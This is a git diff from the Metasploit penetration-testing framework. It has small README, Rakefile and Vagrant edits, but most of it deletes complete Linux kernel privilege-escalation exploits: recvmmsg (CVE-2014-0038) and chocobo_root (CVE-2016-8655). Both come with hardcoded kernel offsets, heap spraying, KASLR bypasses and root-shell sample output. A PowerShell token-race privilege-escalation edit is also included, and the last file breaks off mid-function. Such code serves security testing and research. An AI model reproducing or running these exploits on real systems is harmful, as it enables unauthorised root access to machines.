 COPYING for more details.
@@ -9,19 +9,20 @@ Bug tracking and development information can be found at:
 https://github.com/rapid7/metasploit-framework

 New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+  http://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
  https://rapid7.github.io/metasploit-framework/api

-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+Questions and suggestions can be sent to:
+  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers

 Installing
 --

-Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+Generally, you should use [the free installer](https://www.metasploit.com/download),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -44,6 +45,6 @@ pull request. For slightly more information, see
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -0,0 +1,27 @@
+**This should never appear in Metasploit Framework's master branch!**
+
+The components under the unstable-* directories are unstable, in that
+they are untested, unverified, or otherwise incomplete. Many may be
+useful, but all require some level of work to get into the Metasploit
+master branch.
+
+In order to load the modules specifically, use:
+
+$ ./msfconsole -m unstable-modules/
+
+Unstable scripts and plugins may be referenced by full pathname
+normally.
+
+In order to help move these out of unstable and into the master
+branch, please fork the Metasploit framework project and send pull
+requests with your fixes back to the unstable branch. If you're
+reading this, you already probably have a GitHub account and are
+already familiar with the mechanics of forking and branching.
+Specifically, you probably know everything discussed on:
+
+https://github.com/rapid7/metasploit-framework/wiki
+
+Thanks for taking a look at these unstable modules!
+
+- Tod Beardsley, todb[at]metasploit[dot]com
+
@@ -9,20 +9,6 @@ require 'metasploit/framework/spec/untested_payloads'
 # the user installs with `bundle install --without db`
 Metasploit::Framework::Require.optionally_active_record_railtie

-begin
-  require 'rspec/core'
-  require 'rspec-rerun/tasks'
-rescue LoadError
-  puts "rspec not in bundle, so can't set up spec tasks.  " \
-       "To run specs ensure to install the development and test groups."
-  puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
-  puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
-       "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
-else
-  require 'rspec/core/rake_task'
-  RSpec::Core::RakeTask.new(spec: 'db:test:prepare')
-end
-
 Metasploit::Framework::Application.load_tasks
 Metasploit::Framework::Spec::Constants.define_task
 Metasploit::Framework::Spec::Threads::Suite.define_task
@@ -3,7 +3,10 @@

 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/xenial64"
+  config.vm.box = "ubuntu/trusty64"
+  # TODO: find a minimal image that keeps up-to-date and
+  # supports multiple providers
+  #config.vm.box = "phusion/ubuntu-14.04-amd64"
  config.vm.network :forwarded_port, guest: 4444, host: 4444
  config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -23,14 +26,14 @@ Vagrant.configure(2) do |config|
  [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
    "apt-get update",
    "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
  ].each do |step|
    config.vm.provision "shell", inline: step
  end

  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
@@ -1,226 +0,0 @@
-/* 
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
-recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
-CVE-2014-0038 / x32 ABI with recvmmsg
-by rebel @ irc.smashthestack.org
-----------------------------------
-
-takes about 13 minutes to run because timeout->tv_sec is decremented
-once per second and 0xff*3 is 765.
-
-some things you could do while waiting:
-  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
-  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
-  * brew some coffee
-  * stare at the countdown giggly with anticipation
-
-could probably whack the high bits of some pointer with nanoseconds,
-but that would require a bunch of nulls before the pointer and then
-reading an oops from dmesg which isn't that elegant.
-
-&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
-
-hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
-anyway..
-
-same principle will work on 32bit but I didn't really find any major
-distros shipping with CONFIG_X86_X32=y
-
-user@ubuntu:~$ uname -a
-Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
-user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
-user@ubuntu:~$ ./recvmmsg
-byte 3 / 3.. ~0 secs left.     
-w00p w00p!
-# id
-uid=0(root) gid=0(root) groups=0(root)
-# sh phalanx-2.6b-x86_64.sh
-unpacking..
-
-:)=
-
-greets to my homeboys kaliman, beist, capsl & all of #social
-
-Sat Feb  1 22:15:19 CET 2014
-% rebel %
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
-*/
-
-#define _GNU_SOURCE
-#include <netinet/ip.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <unistd.h>
-#include <sys/syscall.h>
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <sys/utsname.h>
-
-#define __X32_SYSCALL_BIT 0x40000000
-#undef __NR_recvmmsg
-#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
-#define VLEN 1
-#define BUFSIZE 200
-
-int port;
-
-struct offset {
-    char *kernel_version;
-    unsigned long dest; // net_sysctl_root + 96
-    unsigned long original_value; // net_ctl_permissions
-    unsigned long prepare_kernel_cred;
-    unsigned long commit_creds;
-};
-
-struct offset offsets[] = {
-    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
-    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
-    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
-    {NULL,0,0,0,0}
-};
-
-void udp(int b) {
-    int sockfd;
-    struct sockaddr_in servaddr,cliaddr;
-    int s = 0xff+1;
-
-    if(fork() == 0) {
-        while(s > 0) {
-            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
-            sleep(1);
-            s--;
-            fprintf(stderr,".");
-        }
-
-        sockfd = socket(AF_INET,SOCK_DGRAM,0);
-        bzero(&servaddr,sizeof(servaddr));
-        servaddr.sin_family = AF_INET;
-        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
-        servaddr.sin_port=htons(port);
-        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
-        exit(0);
-    }
-
-}
-
-void trigger() {
-    open("/proc/sys/net/core/somaxconn",O_RDONLY);
-
-    if(getuid() != 0) {
-        fprintf(stderr,"not root, ya blew it!\n");
-        exit(-1);
-    }
-
-    fprintf(stderr,"w00p w00p!\n");
-    system("/bin/sh -i");
-}
-
-typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
-typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
-_commit_creds commit_creds;
-_prepare_kernel_cred prepare_kernel_cred;
-
-// thx bliss
-static int __attribute__((regparm(3)))
-getroot(void *head, void * table)
-{
-    commit_creds(prepare_kernel_cred(0));
-    return -1;
-}
-
-void __attribute__((regparm(3)))
-trampoline()
-{
-    asm("mov $getroot, %rax; call *%rax;");
-}
-
-int main(void)
-{
-    int sockfd, retval, i;
-    struct sockaddr_in sa;
-    struct mmsghdr msgs[VLEN];
-    struct iovec iovecs[VLEN];
-    char buf[BUFSIZE];
-    long mmapped;
-    struct utsname u;
-    struct offset *off = NULL;
-
-    uname(&u);
-
-    for(i=0;offsets[i].kernel_version != NULL;i++) {
-        if(!strcmp(offsets[i].kernel_version,u.release)) {
-            off = &offsets[i];
-            break;
-        }
-    }
-
-    if(!off) {
-        fprintf(stderr,"no offsets for this kernel version..\n");
-        exit(-1);
-    }
-
-    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
-    mmapped &= 0x000000ffffffffff;
-
-        srand(time(NULL));
-    port = (rand() % 30000)+1500;
-
-    commit_creds = (_commit_creds)off->commit_creds;
-    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
-
-    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
-
-    if(mmapped == -1) {
-        perror("mmap()");
-        exit(-1);
-    }
-
-    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
-
-    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
-
-    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
-        perror("mprotect()");
-        exit(-1);
-    }
-    
-    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
-    if (sockfd == -1) {
-        perror("socket()");
-        exit(-1);
-    }
-
-    sa.sin_family = AF_INET;
-    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
-    sa.sin_port = htons(port);
-
-    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
-        perror("bind()");
-        exit(-1);
-    }
-
-    memset(msgs, 0, sizeof(msgs));
-
-    iovecs[0].iov_base = &buf;
-    iovecs[0].iov_len = BUFSIZE;
-    msgs[0].msg_hdr.msg_iov = &iovecs[0];
-    msgs[0].msg_hdr.msg_iovlen = 1;
-
-    for(i=0;i < 3 ;i++) {
-        udp(i);
-        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
-        if(!retval) {
-            fprintf(stderr,"\nrecvmmsg() failed\n");
-        }
-    }
-
-    close(sockfd); 
-
-    fprintf(stderr,"\n");
-
-    trigger();
-}
@@ -155,8 +155,8 @@ Add-Type -TypeDefinition @"
        # CreateProcessWithLogonW --> lpCurrentDirectory
        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
+	$path1 = $env:windir
+    	$path1 = "$path1\System32\cmd.exe"
        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
@@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
    $TidArray = @()

    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
+    # Loop Get-ThreadHandle and collect thread handles with a valid TID
+    for ($i=0; $i -lt 500; $i++) {
        $hThread = Get-ThreadHandle
        $hThreadID = [Kernel32]::GetThreadId($hThread)
        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@@ -309,19 +309,6 @@ Add-Type -TypeDefinition @"
            0x00000002, $cmd, $args1,
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
        $hTokenHandle = [IntPtr]::Zero
        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)

@@ -344,4 +331,4 @@ Add-Type -TypeDefinition @"
        $StartTokenRace.Stop()
        $SafeGuard.Stop()
    }
-    exit
+    exit
@@ -1,945 +0,0 @@
-/*
-chocobo_root.c
-linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP/SMAP bypasses.
-For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
-All kernel offsets have been tested on Ubuntu / Linux Mint.
-
-vroom vroom
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
-user@ubuntu:~$ uname -a
-Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-user@ubuntu:~$ id
-uid=1000(user) gid=1000(user) groups=1000(user)
-user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
-user@ubuntu:~$ ./chocobo_root
-linux AF_PACKET race condition exploit by rebel
-kernel version: 4.4.0-51-generic #72
-proc_dostring = 0xffffffff81088090
-modprobe_path = 0xffffffff81e48f80
-register_sysctl_table = 0xffffffff812879a0
-set_memory_rw = 0xffffffff8106f320
-exploit starting
-making vsyscall page writable..
-
-new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
-sockets allocated
-removing barrier and spraying..
-version switcher stopping, x = -1 (y = 174222, last val = 2)
-current packet version = 0
-pbd->hdr.bh1.offset_to_first_pkt = 48
-*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
-please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
-closing socket and verifying.......
-vsyscall page altered!
-
-
-stage 1 completed
-registering new sysctl..
-
-new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
-sockets allocated
-removing barrier and spraying..
-version switcher stopping, x = -1 (y = 30773, last val = 0)
-current packet version = 2
-pbd->hdr.bh1.offset_to_first_pkt = 48
-race not won
-
-retrying stage..
-new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
-sockets allocated
-removing barrier and spraying..
-version switcher stopping, x = -1 (y = 133577, last val = 2)
-current packet version = 0
-pbd->hdr.bh1.offset_to_first_pkt = 48
-*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
-please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
-closing socket and verifying.......
-sysctl added!
-
-stage 2 completed
-binary executed by kernel, launching rootshell
-root@ubuntu:~# id
-uid=0(root) gid=0(root) groups=0(root),1000(user)
-
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
-
-Shoutouts to:
-jsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)
-mcdelivery for delivering hotcakes and coffee
-
-11/2016
-by rebel
---
-Updated by <bcoles@gmail.com>
- check number of CPU cores
- KASLR bypasses
- additional kernel targets
-https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
-*/
-
-#define _GNU_SOURCE
-
-#include <fcntl.h>
-#include <poll.h>
-#include <pthread.h>
-#include <sched.h>
-#include <signal.h>
-#include <stdbool.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-
-#include <sys/klog.h>
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <sys/stat.h>
-#include <sys/syscall.h>
-#include <sys/sysinfo.h>
-#include <sys/utsname.h>
-#include <sys/wait.h>
-
-#include <arpa/inet.h>
-#include <linux/if_packet.h>
-#include <linux/sched.h>
-#include <netinet/tcp.h>
-#include <netinet/if_ether.h>
-
-#define DEBUG
-
-#ifdef DEBUG
-#  define dprintf printf
-#else
-#  define dprintf
-#endif
-
-#define ENABLE_KASLR_BYPASS 1
-
-// Will be overwritten if ENABLE_KASLR_BYPASS
-unsigned long KERNEL_BASE = 0xffffffff81000000ul;
-
-// Will be overwritten by detect_versions()
-int kernel = -1;
-
-// New sysctl path
-const char *SYSCTL_NAME = "hack";
-const char *SYSCTL_PATH = "/proc/sys/hack";
-
-volatile int barrier = 1;
-volatile int vers_switcher_done = 0;
-
-struct kernel_info {
-    char *kernel_version;
-    unsigned long proc_dostring;
-    unsigned long modprobe_path;
-    unsigned long register_sysctl_table;
-    unsigned long set_memory_rw;
-};
-
-struct kernel_info kernels[] = {
-    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
-    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
-    { "4.4.0-24-generic #43~14.04.1-Ubuntu", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },
-    { "4.4.0-28-generic #47~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },
-    { "4.4.0-31-generic #50~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },
-    { "4.4.0-34-generic #53~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },
-    { "4.4.0-36-generic #55~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },
-    { "4.4.0-38-generic #57~14.04.1-Ubuntu", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },
-    { "4.4.0-42-generic #62~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274300, 0x06b880 },
-    { "4.4.0-45-generic #66~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274340, 0x06b880 },
-    //{"4.4.0-46-generic #67~14.04.1-Ubuntu",0x0842f0,0xe4b100,0x274580,0x06b880},
-    { "4.4.0-47-generic #68~14.04.1-Ubuntu", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },
-    //{"4.4.0-49-generic #70~14.04.1-Ubuntu",0x084350,0xe4b100,0x274b10,0x06b880},
-    { "4.4.0-51-generic #72~14.04.1-Ubuntu", 0x084350, 0xe4b100, 0x274750, 0x06b880 },
-
-    { "4.4.0-21-generic #37-Ubuntu", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },
-    { "4.4.0-22-generic #40-Ubuntu", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },
-    { "4.4.0-24-generic #43-Ubuntu", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },
-    { "4.4.0-28-generic #47-Ubuntu", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },
-    { "4.4.0-31-generic #50-Ubuntu", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },
-    { "4.4.0-34-generic #53-Ubuntu", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },
-    { "4.4.0-36-generic #55-Ubuntu", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },
-    { "4.4.0-38-generic #57-Ubuntu", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },
-    { "4.4.0-42-generic #62-Ubuntu", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },
-    { "4.4.0-43-generic #63-Ubuntu", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },
-    { "4.4.0-45-generic #66-Ubuntu", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },
-    //{"4.4.0-46-generic #67-Ubuntu",0x088040,0xe48f80,0x287800,0x06f320},
-    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
-    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
-    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
-};
-
-#define VSYSCALL              0xffffffffff600000
-#define PROC_DOSTRING         (KERNEL_BASE + kernels[kernel].proc_dostring)
-#define MODPROBE_PATH         (KERNEL_BASE + kernels[kernel].modprobe_path)
-#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)
-#define SET_MEMORY_RW         (KERNEL_BASE + kernels[kernel].set_memory_rw)
-
-#define KMALLOC_PAD 64
-
-int pad_fds[KMALLOC_PAD];
-
-// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
-
-struct ctl_table {
-    const char *procname;
-    void *data;
-    int maxlen;
-    unsigned short mode;
-    struct ctl_table *child;
-    void *proc_handler;
-    void *poll;
-    void *extra1;
-    void *extra2;
-};
-
-#define CONF_RING_FRAMES 1
-
-struct tpacket_req3 tp;
-int sfd;
-int mapped = 0;
-
-struct timer_list {
-    void *next;
-    void *prev;
-    unsigned long           expires;
-    void                    (*function)(unsigned long);
-    unsigned long           data;
-    unsigned int            flags;
-    int                     slack;
-};
-
-// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
-
-void *setsockopt_thread(void *arg)
-{
-    while (barrier) {}
-    setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));
-
-    return NULL;
-}
-
-void *vers_switcher(void *arg)
-{
-    int val,x,y;
-
-    while (barrier) {}
-
-    while (1) {
-        val = TPACKET_V1;
-        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
-
-        y++;
-
-        if (x != 0) break;
-
-        val = TPACKET_V3;
-        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
-
-        if (x != 0) break;
-
-        y++;
-    }
-
-    dprintf("[.] version switcher stopping, x = %d (y = %d, last val = %d)\n",x,y,val);
-    vers_switcher_done = 1;
-
-    return NULL;
-}
-
-// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
-
-#define BUFSIZE 1408
-char exploitbuf[BUFSIZE];
-
-void kmalloc(void)
-{
-    while(1)
-        syscall(__NR_add_key, "user", "wtf", exploitbuf, BUFSIZE - 24, -2);
-}
-
-void pad_kmalloc(void)
-{
-    int x;
-    for (x = 0; x < KMALLOC_PAD; x++)
-        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
-            dprintf("[-] pad_kmalloc() socket error\n");
-            exit(EXIT_FAILURE);
-        }
-}
-
-// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
-
-int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
-{
-    pthread_t setsockopt_thread_thread,a;
-    int val;
-    socklen_t l;
-    struct timer_list *timer;
-    int fd;
-    struct tpacket_block_desc *pbd;
-    int off;
-    sigset_t set;
-
-    sigemptyset(&set);
-
-    sigaddset(&set, SIGSEGV);
-
-    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
-        exit(1);
-    }
-
-    dprintf("[.] new exploit attempt starting, jumping to %p, arg=%p\n", (void *)func, (void *)arg);
-
-    pad_kmalloc();
-
-    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
-
-    if (fd == -1) {
-        dprintf("[-] target socket error\n");
-        exit(1);
-    }
-
-    pad_kmalloc();
-
-    dprintf("[.] done, sockets allocated\n");
-
-    val = TPACKET_V3;
-
-    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
-
-    tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
-    tp.tp_block_nr = 1;
-    tp.tp_frame_size = getpagesize();
-    tp.tp_frame_nr = CONF_RING_FRAMES;
-
-    // try to set the timeout to 10 seconds
-    // the default timeout might still be used though depending on when the race was won
-    tp.tp_retire_blk_tov = 10000;
-
-    sfd = fd;
-
-    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
-        dprintf("[-] Error creating thread\n");
-        return 1;
-    }
-
-    pthread_create(&a, NULL, vers_switcher, (void *)NULL);
-
-    usleep(200000);
-
-    dprintf("[.] removing barrier and spraying...\n");
-
-    memset(exploitbuf, '\x00', BUFSIZE);
-
-    timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);
-    timer->next = 0;
-    timer->prev = 0;
-
-    timer->expires = 4294943360;
-    timer->function = (void *)func;
-    timer->data = arg;
-    timer->flags = 1;
-    timer->slack = -1;
-
-    barrier = 0;
-
-    usleep(100000);
-
-    while (!vers_switcher_done) usleep(100000);
-
-    l = sizeof(val);
-    getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);
-
-    dprintf("[.] current packet version = %d\n",val);
-
-    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
-
-    if (pbd == MAP_FAILED) {
-        dprintf("[-] could not map pbd\n");
-        exit(1);
-    } else {
-        off = pbd->hdr.bh1.offset_to_first_pkt;
-        dprintf("[.] pbd->hdr.bh1.offset_to_first_pkt = %d\n", off);
-    }
-
-
-    if (val == TPACKET_V1 && off != 0) {
-        dprintf("*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\n");
-    } else {
-        dprintf("[-] race not won\n");
-        exit(2);
-    }
-
-    munmap(pbd, tp.tp_block_size * tp.tp_block_nr);
-
-    pthread_create(&a, NULL, verification_func, (void *)NULL);
-
-    dprintf("\n");
-    dprintf("[!] please wait up to a few minutes for timer to be executed.\n");
-    dprintf("[!] if you ctrl-c now the kernel will hang. so don't do that.\n");
-    dprintf("\n");
-
-    sleep(1);
-    dprintf("[.] closing socket and verifying...\n");
-
-    close(sfd);
-
-    kmalloc();
-
-    dprintf("[.] all messages sent\n");
-
-    sleep(31337);
-    exit(1);
-}
-
-int verification_result = 0;
-
-void catch_sigsegv(int sig)
-{
-    verification_result = 0;
-    pthread_exit((void *)1);
-}
-
-void *modify_vsyscall(void *arg)
-{
-    unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);
-    unsigned long x = (unsigned long)arg;
-
-    sigset_t set;
-    sigemptyset(&set);
-    sigaddset(&set, SIGSEGV);
-
-    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
-        exit(EXIT_FAILURE);
-    }
-
-    signal(SIGSEGV, catch_sigsegv);
-
-    *vsyscall = 0xdeadbeef+x;
-
-    if (*vsyscall == 0xdeadbeef+x) {
-        dprintf("[~] vsyscall page altered!\n");
-        verification_result = 1;
-        pthread_exit(0);
-    }
-
-    return NULL;
-}
-
-void verify_stage1(void)
-{
-    pthread_t v_thread;
-
-    sleep(5);
-
-    int x;
-    for(x = 0; x < 300; x++) {
-
-        pthread_create(&v_thread, NULL, modify_vsyscall, 0);
-
-        pthread_join(v_thread, NULL);
-
-        if(verification_result == 1) {
-            exit(0);
-        }
-
-        write(2,".",1);
-        sleep(1);
-    }
-
-    dprintf("[-] could not modify vsyscall\n");
-    exit(EXIT_FAILURE);
-}
-
-void verify_stage2(void)
-{
-    struct stat b;
-
-    sleep(5);
-
-    int x;
-    for(x = 0; x < 300; x++) {
-
-        if (stat(SYSCTL_PATH, &b) == 0) {
-            dprintf("[~] sysctl added!\n");
-            exit(0);
-        }
-
-        write(2,".",1);
-        sleep(1);
-    }
-
-    dprintf("[-] could not add sysctl\n");
-    exit(EXIT_FAILURE);
-}
-
-void exploit(unsigned long func, unsigned long arg, void *verification_func)
-{
-    int status;
-    int pid;
-
-retry:
-
-    pid = fork();
-
-    if (pid == 0) {
-        try_exploit(func, arg, verification_func);
-        exit(1);
-    }
-
-    wait(&status);
-
-    dprintf("\n");
-
-    if (WEXITSTATUS(status) == 2) {
-        dprintf("[.] retrying stage...\n");
-        kill(pid, 9);
-        sleep(2);
-        goto retry;
-    }
-
-    if (WEXITSTATUS(status) != 0) {
-        dprintf("[-] something bad happened, aborting exploit attempt\n");
-        exit(EXIT_FAILURE);
-    }
-
-    kill(pid, 9);
-}
-
-
-void wrapper(void)
-{
-    struct ctl_table *c;
-
-    dprintf("[.] making vsyscall page writable...\n\n");
-
-    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);
-
-    dprintf("[~] done, stage 1 completed\n");
-
-    sleep(5);
-
-    dprintf("[.] registering new sysctl...\n\n");
-
-    c = (struct ctl_table *)(VSYSCALL+0x850);
-
-    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
-
-    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
-    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
-    c->procname = (char *)(VSYSCALL+0xf00);
-    c->mode = 0666;
